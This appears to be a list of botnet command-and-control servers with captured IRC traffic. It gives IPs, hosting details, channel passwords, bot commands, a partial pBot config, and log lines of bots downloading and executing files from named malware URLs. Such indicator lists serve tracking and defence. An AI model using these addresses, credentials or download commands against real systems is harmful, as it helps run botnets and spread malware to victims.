38.99.168.199(botnet hosted in United States Washington Psinet Inc)

Remote Host Port Number 38.99.168.199 6667 NICK New[TeSlA|USA|1244024|XP] USER 5224266 “” “lol” :5224266 NICK 3930 NICK [TeSlA|USA|1244024|XP] USER 5695418 “” “lol” :5695418 NICK 3993 infos about hosting: http://whois.domaintools.com/38.99.168.199

ryan1918.has.zero-security.org(botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd

Remote Host Port Number 213.251.170.52 80 89.248.168.231 6869 PASS ngrBot PRIVMSG #ng# :[HTTP]: Updated HTTP spread message to “visit http://goo.gl/o269r” NICK n{US|XPa}kffoslr USER kffoslr 0 0 :kffoslr JOIN #ng# ngrBot PRIVMSG #ng# :[MSN]: Updated MSN spread interval to “3” PRIVMSG #ng# :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #ng# :[MSN]: Updated MSN spread message

178.162.243.248(botnet hosted in Germany Idealhosting Managed Servers)

Remote Host Port Number 178.162.243.248 6667 178.162.243.248 8053 178.162.244.176 80 208.64.178.140 80 217.195.203.197 80 46.45.138.126 80 82.151.139.103 80 82.151.139.109 80 MODE #Oyun MODE #Sohbet MODE #MuhabbeT NICK mIRCTurK113395 USER mIRCTurk “” “Irc.mIRCTurkk.CoM” : e mIRC Www.mircturkk.Com NOTICE IRC : VERSION mIRC v6.03 Khaled Mardam-Bey JOIN #Radyo,#yarisma,#kelime,#Oyun,#Sohbet,#MuhabbeT MODE mIRCTurK113395 +i MODE #Radyo PONG :irc.miRCTurkk.com MODE #yarisma

178.211.56.102(botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

178.211.56.102:80 PASS owned PASS owned USER [XP]sixfecu [XP]sixfecu [XP]sixfecu :[XP]sixfecu NICK [XP]sixfecu :irc.dal.net NOTICE AUTH :*** Looking up your hostname… :irc.dal.net NOTICE AUTH :*** Found your hostname (cached) :irc.dal.net 001 [XP]sixfecu :irc.dal.net 002 [XP]sixfecu : M0dded by uNkn0wn Crew :irc.dal.net 003 [XP]sixfecu :irc.dal.net 004 [XP]sixfecu : www.uNkn0wn.eu – iD@uNkn0wn.eu :irc.dal.net 005 [XP]sixfecu :irc.dal.net 005 [XP]sixfecu

122.155.8.162(botnet hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)

around 1k linux bots inside class pBot { var $config = array(“server”=>”122.155.8.162:3306”, “port”=>”3306”, “pass”=>””, “prefix”=>”EtexBOT”, “maxrand”=>”6”, “chan”=>”#babi123”, “chan2″=>”#”, “key”=>””, “modes”=>”+p”, “password”=>”lol123”, “trigger”=>”.”, snk chanel inside that ruski lamer is everywhere lol infos about hosting: http://whois.domaintools.com/122.155.8.162

210.170.62.106(botnet hosted in Japan Rcp Co Ltd)

210.170.62.106:2345 Nick: New[AUT|00|P|19076] Username: XP-1227 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://urlcut.me/images93663?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|19076]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/210.170.62.106

75.102.22.40(botnet hosted in 100mbps.ru)

Remote Host Port Number 204.0.5.51 80 63.135.80.224 80 63.135.80.46 80 75.102.22.40 1866 PASS xxx MODE NEW-[USA|00|P|41019] -ix JOIN #!high! test PONG 22 MOTD NICK NEW-[USA|00|P|41019] USER XP-6548 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/75.102.22.40

dns.photomarket.me(ngr bot hosted in Latvia Workstone Corporation)

Remote Host Port Number 194.247.48.62 1234 PASS priv9 213.251.170.52 80 64.62.181.43 80 66.197.139.152 80 PRIVMSG #ngr :[Ruskill]: Removing “C:WINDOWSsystem32drwtsn32.exe” at reboot PRIVMSG #ngr :[d=”http://datapimp.fileave.com/setup1.exe” s=”129024 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” NICK n{US|XP}rdhulwp USER rdhulwp 0 0 :rdhulwp JOIN #ngr HELO PRIVMSG #ngr :[d=”http://mediamarkinc.in/install.52145.exe” s=”73728 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” PRIVMSG #ngr